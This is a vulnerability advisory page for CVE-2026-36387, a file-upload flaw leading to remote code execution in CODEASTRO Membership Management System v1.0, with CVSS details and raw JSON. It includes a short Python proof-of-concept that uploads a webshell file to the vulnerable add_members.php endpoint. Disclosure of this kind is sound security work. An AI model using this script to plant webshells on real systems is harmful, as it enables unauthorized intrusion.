Security Vulnerability Report
中文
CVE-2026-36387 CVSS 6.5 MEDIUM

CVE-2026-36387

Published: 2026-05-07 16:16:19
Last Modified: 2026-05-07 18:45:48

Description

A Remote Code Execution vulnerability was found in CODEASTRO Membership Management System v1.0 in /add_members.php. This vulnerability affects the file upload functionality, where improper file sanitization allows attackers to inject malicious files which leads RCE.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CODEASTRO Membership Management System v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL url = "http://target.com/add_members.php" # Path to the malicious PHP file (webshell) file_path = "shell.php" # Prepare the payload # The vulnerability allows uploading files without proper sanitization files = { 'file': (file_path, open(file_path, 'rb'), 'application/octet-stream') } data = { 'submit': 'Submit' # Adjust based on actual form parameters } try: response = requests.post(url, files=files, data=data) if response.status_code == 200: print("[+] File uploaded successfully.") print("[+] Check the upload directory to access the shell.") else: print("[-] Upload failed.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-36387", "sourceIdentifier": "[email protected]", "published": "2026-05-07T16:16:19.013", "lastModified": "2026-05-07T18:45:48.327", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Remote Code Execution vulnerability was found in CODEASTRO Membership Management System v1.0 in /add_members.php. This vulnerability affects the file upload functionality, where improper file sanitization allows attackers to inject malicious files which leads RCE."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "http://codeastro.com", "source": "[email protected]"}, {"url": "https://github.com/raneishajustin/CVE/tree/main/CVE-2026-36387", "source": "[email protected]"}, {"url": "https://github.com/raneishajustin/CVE/tree/main/CVE-2026-36387", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}